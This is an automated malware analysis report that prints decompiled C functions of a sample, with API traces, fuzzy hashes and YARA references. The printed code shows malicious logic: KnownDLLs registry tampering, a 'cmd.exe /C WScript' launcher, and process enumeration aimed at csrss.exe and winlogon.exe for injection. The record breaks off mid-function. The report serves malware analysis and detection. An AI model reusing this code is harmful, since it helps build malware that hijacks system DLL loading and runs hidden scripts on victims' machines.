                                                                                                                                          • ExitThread.KERNEL32 ref: 0040843F
                                                                                                                                          • ExitThread.KERNEL32 ref: 00408447
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1465093181-0
                                                                                                                                          • Opcode ID: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
                                                                                                                                          • Instruction ID: 538b4140d65d2fd151ab259c2702cab8e281b3ea1c27d0cfeab488a6800ad3c5
                                                                                                                                          • Opcode Fuzzy Hash: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
                                                                                                                                          • Instruction Fuzzy Hash: 64114971A40319BBEB11DBA4DE45F9F7B78AF04741F140025B604BA1D1DBB4AE40CB99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00402DD0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 29registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00402DD0(void* __ecx) {
				void* _v8;
				long _t8;

				_t1 =  &_v8; // 0x402f21
				_v8 = 0;
				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f, _t1);
				if(_t8 == 0) {
					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E00401B40(L"ntdll.dll") * 2);
					return RegCloseKey(_v8);
				}
				return _t8;
			}





                                                                                                                                          0x00402dd4
                                                                                                                                          0x00402dd7
                                                                                                                                          0x00402df0
                                                                                                                                          0x00402df8
                                                                                                                                          0x00402e20
                                                                                                                                          0x00000000
                                                                                                                                          0x00402e29
                                                                                                                                          0x00402e32

                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,!/@), ref: 00402DF0
                                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 00402E20
                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402E29
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                          • String ID: !/@$SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
                                                                                                                                          • API String ID: 779948276-871150387
                                                                                                                                          • Opcode ID: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
                                                                                                                                          • Instruction ID: 484440f86f87c03b30c3bb65dbd638c5ca07b71e5d6230add0e59dd50d7b01eb
                                                                                                                                          • Opcode Fuzzy Hash: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
                                                                                                                                          • Instruction Fuzzy Hash: E6F0A071680208BBEB119B91DE0BFAA7678E744B04F200076FA01B11E2E6B56E14D648
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00406CA0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49threadprocessCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                          			E00406CA0(intOrPtr _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1128;
				long _t25;

				E00401BB0( &_v88, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x10], xmm0");
				E00401A00( &_v1128, L"cmd.exe /C WScript \"");
				E00401970( &_v1128, _a4 - 0xffffff80);
				E00401970( &_v1128, "\"");
				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				if(_t25 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					ExitThread(_v20.dwProcessId);
				}
				ExitThread(_t25);
			}







                                                                                                                                          0x00406cb1
                                                                                                                                          0x00406cbc
                                                                                                                                          0x00406cc5
                                                                                                                                          0x00406cc9
                                                                                                                                          0x00406cdc
                                                                                                                                          0x00406ced
                                                                                                                                          0x00406d15
                                                                                                                                          0x00406d1d
                                                                                                                                          0x00406d29
                                                                                                                                          0x00406d32
                                                                                                                                          0x00406d3b
                                                                                                                                          0x00406d3b
                                                                                                                                          0x00406d20

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseExitHandleThread$CreateProcess
                                                                                                                                          • String ID: cmd.exe /C WScript "
                                                                                                                                          • API String ID: 3397019416-3599441821
                                                                                                                                          • Opcode ID: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
                                                                                                                                          • Instruction ID: eef6df8135acf94fe22a1234d31cd8a2743a9bcf06af6411463f708c953a90e9
                                                                                                                                          • Opcode Fuzzy Hash: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
                                                                                                                                          • Instruction Fuzzy Hash: 05111BB1A40319BAEB10ABE0CE4AF9E777CAF15700F500176B305B50E2E779AA54CB5D
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00408270, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 24libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                          			E00408270(void* __ecx, char _a4) {
				char _v8;
				_Unknown_base(*)()* _t6;
				void* _t8;

				_v8 = 0;
				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t6 == 0) {
					L3:
					return _v8;
				} else {
					_t3 =  &_a4; // 0x403432
					_t8 =  *_t6( *_t3,  &_v8);
					if(_t8 != 0) {
						goto L3;
					} else {
						return _t8;
					}
				}
			}






                                                                                                                                          0x0040827e
                                                                                                                                          0x0040828c
                                                                                                                                          0x00408294
                                                                                                                                          0x004082a7
                                                                                                                                          0x004082ad
                                                                                                                                          0x00408296
                                                                                                                                          0x0040829a
                                                                                                                                          0x0040829d
                                                                                                                                          0x004082a1
                                                                                                                                          0x00000000
                                                                                                                                          0x004082a6
                                                                                                                                          0x004082a6
                                                                                                                                          0x004082a6
                                                                                                                                          0x004082a1

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040828C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: 24@$IsWow64Process$kernel32
                                                                                                                                          • API String ID: 1646373207-2506754407
                                                                                                                                          • Opcode ID: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
                                                                                                                                          • Instruction ID: 4e0a41bddc85eb87f205be8107a504d095728719a775a610ae93757d078e0763
                                                                                                                                          • Opcode Fuzzy Hash: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
                                                                                                                                          • Instruction Fuzzy Hash: 6CE04F71644309ABDB10DBD0DE09B6E77ACDF41345F1441EDB808A2290EA799E109659
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004016A0, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E004016A0(void* _a4, char _a8) {
				long _t5;
				long _t9;

				_t1 =  &_a8; // 0x404d23
				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4,  *_t1);
				_t9 = _t5;
				if(_t9 == 0) {
					HeapFree(GetProcessHeap(), _t5, _a4);
					return _t9;
				}
				return _t5;
			}





                                                                                                                                          0x004016a4
                                                                                                                                          0x004016b3
                                                                                                                                          0x004016b9
                                                                                                                                          0x004016bd
                                                                                                                                          0x004016ca
                                                                                                                                          0x00000000
                                                                                                                                          0x004016d0
                                                                                                                                          0x004016d4

                                                                                                                                          APIs
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,#M@,00000000,?,00404D23,00000000,00000000), ref: 004016AC
                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016B3
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00404D23,00000000,00000000), ref: 004016C3
                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016CA
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$Process$AllocFree
                                                                                                                                          • String ID: #M@
                                                                                                                                          • API String ID: 756756679-4131475827
                                                                                                                                          • Opcode ID: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
                                                                                                                                          • Instruction ID: ff7cb380345909262a6c5e90b85417ef13bbf769aef9ce5e450cfb0b8575ba0d
                                                                                                                                          • Opcode Fuzzy Hash: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
                                                                                                                                          • Instruction Fuzzy Hash: 24E0EC36900214BBCF111FE5AD1CA9A3F2DEB087A2F048424FB0DE6221C635CD20DB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00408CE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                          			E00408CE0() {
				_Unknown_base(*)()* _t2;
				signed int _t3;
				signed int _t5;
				void* _t9;

				 *0x5d2e0c = 0x11c;
				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
				if(_t2 != 0) {
					 *_t2(0x5d2e0c);
				}
				_t3 =  *0x5d2e10; // 0xa
				if(_t3 == 0) {
					L22:
					return _t3;
				} else {
					_t5 = _t3 << 0x00000008 |  *0x5d2e14;
					_t9 = _t5 - 0x602;
					if(_t9 > 0) {
						if(_t5 == 0x603) {
							 *0x5d2e08 = 4;
							return _t5;
						}
						if(_t5 == 0xa00) {
							_t3 =  *0x5d2e18; // 0x42ee
							if(_t3 < 0x3fab) {
								if(_t3 < 0x3ad7) {
									if(_t3 < 0x3839) {
										if(_t3 < 0x295a) {
											goto L22;
										} else {
											 *0x5d2e08 = 5;
											return _t3;
										}
									} else {
										 *0x5d2e08 = 6;
										return _t3;
									}
								} else {
									 *0x5d2e08 = 7;
									return _t3;
								}
							} else {
								 *0x5d2e08 = 8;
								return _t3;
							}
						} else {
							goto L12;
						}
					} else {
						if(_t9 == 0) {
							 *0x5d2e08 = 3;
							return _t5;
						} else {
							if(_t5 == 0x501) {
								 *0x5d2e08 = 1;
								return _t5;
							} else {
								if(_t5 != 0x601) {
									L12:
									 *0x5d2e08 = 0;
									return _t5;
								} else {
									 *0x5d2e08 = 2;
									return _t5;
								}
							}
						}
					}
				}
			}







                                                                                                                                          0x00408cea
                                                                                                                                          0x00408cfb
                                                                                                                                          0x00408d03
                                                                                                                                          0x00408d0a
                                                                                                                                          0x00408d0a
                                                                                                                                          0x00408d0c
                                                                                                                                          0x00408d13
                                                                                                                                          0x00408dca
                                                                                                                                          0x00408dca
                                                                                                                                          0x00408d19
                                                                                                                                          0x00408d1c
                                                                                                                                          0x00408d22
                                                                                                                                          0x00408d27
                                                                                                                                          0x00408d5f
                                                                                                                                          0x00408dc0
                                                                                                                                          0x00000000
                                                                                                                                          0x00408dc0
                                                                                                                                          0x00408d66
                                                                                                                                          0x00408d73
                                                                                                                                          0x00408d7d
                                                                                                                                          0x00408d8f
                                                                                                                                          0x00408da1
                                                                                                                                          0x00408db3
                                                                                                                                          0x00000000
                                                                                                                                          0x00408db5
                                                                                                                                          0x00408db5
                                                                                                                                          0x00408dbf
                                                                                                                                          0x00408dbf
                                                                                                                                          0x00408da3
                                                                                                                                          0x00408da3
                                                                                                                                          0x00408dad
                                                                                                                                          0x00408dad
                                                                                                                                          0x00408d91
                                                                                                                                          0x00408d91
                                                                                                                                          0x00408d9b
                                                                                                                                          0x00408d9b
                                                                                                                                          0x00408d7f
                                                                                                                                          0x00408d7f
                                                                                                                                          0x00408d89
                                                                                                                                          0x00408d89
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00408d29
                                                                                                                                          0x00408d29
                                                                                                                                          0x00408d4f
                                                                                                                                          0x00408d59
                                                                                                                                          0x00408d2b
                                                                                                                                          0x00408d30
                                                                                                                                          0x00408d44
                                                                                                                                          0x00408d4e
                                                                                                                                          0x00408d32
                                                                                                                                          0x00408d37
                                                                                                                                          0x00408d68
                                                                                                                                          0x00408d68
                                                                                                                                          0x00408d72
                                                                                                                                          0x00408d39
                                                                                                                                          0x00408d39
                                                                                                                                          0x00408d43
                                                                                                                                          0x00408d43
                                                                                                                                          0x00408d37
                                                                                                                                          0x00408d30
                                                                                                                                          0x00408d29
                                                                                                                                          0x00408d27

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,00408DD5,00403448), ref: 00408CF4
                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00408CFB
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                          • API String ID: 1646373207-1489217083
                                                                                                                                          • Opcode ID: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
                                                                                                                                          • Instruction ID: 26c57fc426f1e3111cd77027b938fa7e90139beecd20d4fae7029aa442a0f424
                                                                                                                                          • Opcode Fuzzy Hash: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
                                                                                                                                          • Instruction Fuzzy Hash: 09110D751112008BEB25CF10DF9872A3799EB71700FA8497BD040E52E0CBFC85D9EA4A
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00408B00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10libraryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00408B00(CHAR* _a4) {
				struct HINSTANCE__* _t3;

				_t1 =  &_a4; // 0x402b26
				_t3 = GetModuleHandleA( *_t1);
				if(_t3 == 0) {
					return LoadLibraryA(_a4);
				}
				return _t3;
			}




                                                                                                                                          0x00408b03
                                                                                                                                          0x00408b06
                                                                                                                                          0x00408b0e
                                                                                                                                          0x00000000
                                                                                                                                          0x00408b13
                                                                                                                                          0x00408b1a

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(&+@,?,00402B26,?), ref: 00408B06
                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,?,00402B26,?), ref: 00408B13
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                          • String ID: &+@
                                                                                                                                          • API String ID: 4133054770-3274530745
                                                                                                                                          • Opcode ID: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
                                                                                                                                          • Instruction ID: 6061ff5d45b2c9477c6e6c8a5bdf30d78efc3d99e478dc08a0e6e8702b224e8b
                                                                                                                                          • Opcode Fuzzy Hash: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
                                                                                                                                          • Instruction Fuzzy Hash: 37C04C70100148EBDF011F62ED089993F6DEB416957408035F84DA4132DB369D519A98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Analysis Process: jwMZjhPggeDR.exe PID: 2520 Parent PID: 2492 jwMZjhPggeDR.exeCOMMON

                                                                                                                                          Executed Functions

                                                                                                                                          Function 035D8390, Relevance: 13.6, APIs: 9, Instructions: 65threadsleepprocessCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                          			E035D8390(long* _a4) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				int _t17;
				void* _t35;

				_t35 = OpenProcess(0x1000, 0,  *_a4);
				if(_t35 == 0) {
					ExitThread(0);
				}
				while(1) {
					_v8 = 0;
					_t17 = GetExitCodeProcess(_t35,  &_v8); // executed
					if(_t17 == 0 || (0 | _v8 == 0x00000103) == 0) {
						break;
					}
					Sleep(0x7d0); // executed
				}
				CloseHandle(_t35);
				E035D1BB0( &_v92, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitThread(_v24.dwProcessId);
			}








                                                                                                                                          0x035d83ab
                                                                                                                                          0x035d83af
                                                                                                                                          0x035d8447
                                                                                                                                          0x035d8447
                                                                                                                                          0x035d83c1
                                                                                                                                          0x035d83c4
                                                                                                                                          0x035d83cd
                                                                                                                                          0x035d83d1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d83e8
                                                                                                                                          0x035d83e8
                                                                                                                                          0x035d83f3
                                                                                                                                          0x035d83fd
                                                                                                                                          0x035d8408
                                                                                                                                          0x035d840b
                                                                                                                                          0x035d842c
                                                                                                                                          0x035d8435
                                                                                                                                          0x035d843a
                                                                                                                                          0x035d843f

                                                                                                                                          APIs
                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 035D83A5
                                                                                                                                          • GetExitCodeProcess.KERNEL32(00000000,?), ref: 035D83CD
                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 035D83E8
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D83F3
                                                                                                                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 035D842C
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 035D8435
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 035D843A
                                                                                                                                          • ExitThread.KERNEL32 ref: 035D843F
                                                                                                                                          • ExitThread.KERNEL32 ref: 035D8447
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1465093181-0
                                                                                                                                          • Opcode ID: 19dca3f15d374f621ac9812457748c1bd694b3fcd849c207b09d4c2ddf15c61b
                                                                                                                                          • Instruction ID: 65bc1ed9ba21ce5d9fed701411858b7bb6ecfb921ef76ce1a9160644d69b8ce2
                                                                                                                                          • Opcode Fuzzy Hash: 19dca3f15d374f621ac9812457748c1bd694b3fcd849c207b09d4c2ddf15c61b
                                                                                                                                          • Instruction Fuzzy Hash: 11119331A41319BBEB31EBA4FD49F9E7B78AF04741F240010B608FA1E0D7B0AA54DB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 035D80E0, Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 130libraryprocessloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                          			E035D80E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _v8;
				struct HINSTANCE__* _v12;
				char _v272;
				intOrPtr _v300;
				void* _v308;
				struct HINSTANCE__* _t31;
				void* _t34;
				struct HINSTANCE__* _t39;
				void* _t49;
				void* _t51;
				void* _t55;
				void* _t57;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr* _t66;
				signed int _t69;
				void* _t72;

				if(_a4 == 0) {
					return E035D7EF0("explorer.exe");
				} else {
					_t69 = 0;
					_v308 = 0x128;
					_a4 = 0;
					_t61 = CreateToolhelp32Snapshot(2, 0);
					_v8 = _t61;
					if(_t61 != 0xffffffff) {
						_t66 = 0;
						_t31 = LoadLibraryA("kernel32.dll");
						_v12 = _t31;
						if(_t31 != 0) {
							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId");
						}
						Process32First(_t61,  &_v308);
						_t34 = E035D8DD0();
						_t62 = _a8;
						if(_t34 == 0 || _t66 == 0) {
							L10:
							_t69 = 1;
							 *_t62 = _v300;
						} else {
							 *_t66(_v300,  &_a4);
							if(_a4 != _t69) {
								_t55 = E035D1740("csrss.exe",  &_v272);
								_t72 = _t72 + 8;
								if(_t55 != 0) {
									_t57 = E035D1740("winlogon.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t57 != 0) {
										goto L10;
									}
								}
							}
						}
						while(Process32Next(_v8,  &_v308) != 0) {
							if(E035D8DD0() == 0 || _t66 == 0) {
								L18:
								 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
								_t69 = _t69 + 1;
								if(_t69 < _a12) {
									goto L19;
								}
							} else {
								 *_t66(_v300,  &_a4);
								if(_a4 == 0) {
									goto L19;
								} else {
									_t49 = E035D1740("csrss.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t49 == 0) {
										goto L19;
									} else {
										_t51 = E035D1740("winlogon.exe",  &_v272);
										_t72 = _t72 + 8;
										if(_t51 == 0) {
											goto L19;
										} else {
											goto L18;
										}
									}
								}
							}
							goto L20;
							L19:
						}
						L20:
						CloseHandle(_v8);
						_t39 = _v12;
						if(_t39 != 0) {
							FreeLibrary(_t39);
						}
						return _t69;
					} else {
						return 0;
					}
				}
			}




















                                                                                                                                          0x035d80ed
                                                                                                                                          0x035d8261
                                                                                                                                          0x035d80f3
                                                                                                                                          0x035d80f5
                                                                                                                                          0x035d80f7
                                                                                                                                          0x035d8104
                                                                                                                                          0x035d810c
                                                                                                                                          0x035d810e
                                                                                                                                          0x035d8114
                                                                                                                                          0x035d8124
                                                                                                                                          0x035d8126
                                                                                                                                          0x035d812c
                                                                                                                                          0x035d8131
                                                                                                                                          0x035d813f
                                                                                                                                          0x035d813f
                                                                                                                                          0x035d8149
                                                                                                                                          0x035d814e
                                                                                                                                          0x035d8153
                                                                                                                                          0x035d8158
                                                                                                                                          0x035d819f
                                                                                                                                          0x035d81a5
                                                                                                                                          0x035d81aa
                                                                                                                                          0x035d815e
                                                                                                                                          0x035d8168
                                                                                                                                          0x035d816d
                                                                                                                                          0x035d817b
                                                                                                                                          0x035d8180
                                                                                                                                          0x035d8185
                                                                                                                                          0x035d8193
                                                                                                                                          0x035d8198
                                                                                                                                          0x035d819d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d819d
                                                                                                                                          0x035d8185
                                                                                                                                          0x035d816d
                                                                                                                                          0x035d81bd
                                                                                                                                          0x035d81c7
                                                                                                                                          0x035d820f
                                                                                                                                          0x035d8215
                                                                                                                                          0x035d8218
                                                                                                                                          0x035d821c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d81cd
                                                                                                                                          0x035d81d7
                                                                                                                                          0x035d81dd
                                                                                                                                          0x00000000
                                                                                                                                          0x035d81df
                                                                                                                                          0x035d81eb
                                                                                                                                          0x035d81f0
                                                                                                                                          0x035d81f5
                                                                                                                                          0x00000000
                                                                                                                                          0x035d81f7
                                                                                                                                          0x035d8203
                                                                                                                                          0x035d8208
                                                                                                                                          0x035d820d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d820d
                                                                                                                                          0x035d81f5
                                                                                                                                          0x035d81dd
                                                                                                                                          0x00000000
                                                                                                                                          0x035d821e
                                                                                                                                          0x035d822d
                                                                                                                                          0x035d8231
                                                                                                                                          0x035d8234
                                                                                                                                          0x035d823a
                                                                                                                                          0x035d8240
                                                                                                                                          0x035d8243
                                                                                                                                          0x035d8243
                                                                                                                                          0x035d8250
                                                                                                                                          0x035d8116
                                                                                                                                          0x035d811d
                                                                                                                                          0x035d811d
                                                                                                                                          0x035d8114

                                                                                                                                          APIs
                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,74B5F7F0,00000000), ref: 035D8107
                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,035D67D1,00000002,00000000,74B5F7F0,00000000), ref: 035D8126
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 035D8139
                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 035D8149
                                                                                                                                          • Process32Next.KERNEL32(00001000,00000128,00000000,00000128), ref: 035D81B6
                                                                                                                                          • Process32Next.KERNEL32(00001000,00000128,00001000,00000128,00000000,00000128), ref: 035D8228
                                                                                                                                          • CloseHandle.KERNEL32(00001000,00001000,00000128,00000000,00000128), ref: 035D8234
                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 035D8243
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process32$LibraryNext$AddressCloseCreateFirstFreeHandleLoadProcSnapshotToolhelp32
                                                                                                                                          • String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
                                                                                                                                          • API String ID: 2254598907-4289567422
                                                                                                                                          • Opcode ID: de79d9b868e6eaf7a35caf179d073136a977cda304ce10ee2aef0e14b32a8f43
                                                                                                                                          • Instruction ID: a166576b95e7346ef72933b3f4751a9e4d99d044f7acaf2aaec2bd153c63204c
                                                                                                                                          • Opcode Fuzzy Hash: de79d9b868e6eaf7a35caf179d073136a977cda304ce10ee2aef0e14b32a8f43
                                                                                                                                          • Instruction Fuzzy Hash: E2416275900219AADF31EFA8FC41AEEB7B8BF44351F0400A5EC18D6160E771DA95CA91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D8B20, Relevance: 24.2, APIs: 16, Instructions: 152encryptionfileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 34%
                                                                                                                                          			E035D8B20(WCHAR* _a4, intOrPtr _a8) {
				long* _v8;
				int _v12;
				long _v16;
				int _v20;
				char _v24;
				char _v56;
				void _v1080;
				char _t39;
				long** _t42;
				int* _t43;
				int _t46;
				char* _t51;
				void* _t60;
				intOrPtr* _t69;
				int _t70;
				long _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr _t80;
				void* _t82;
				void* _t87;

				asm("movups xmm0, [0x35daa14]");
				_t39 =  *0x35daa24; // 0x0
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v24 = _t39;
				_t82 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x8000000, 0);
				if(_t82 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_t42 =  &_v8;
					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000);
					if(_t42 != 0) {
						_t43 =  &_v12;
						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43);
						if(_t43 != 0) {
							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0);
							if(_t46 == 0) {
								L11:
								_push(0);
								goto L12;
							} else {
								_t69 = __imp__CryptHashData;
								while(1) {
									_t72 = _v16;
									if(_t72 == 0) {
										break;
									}
									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
									_push(0);
									if(_t60 == 0) {
										L12:
										CryptReleaseContext(_v8);
										__imp__CryptDestroyHash(_v12);
										CloseHandle(_t82);
										L13:
										return 0;
									} else {
										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??);
										if(_t46 != 0) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L20;
								}
								if(_t46 == 0) {
									goto L11;
								} else {
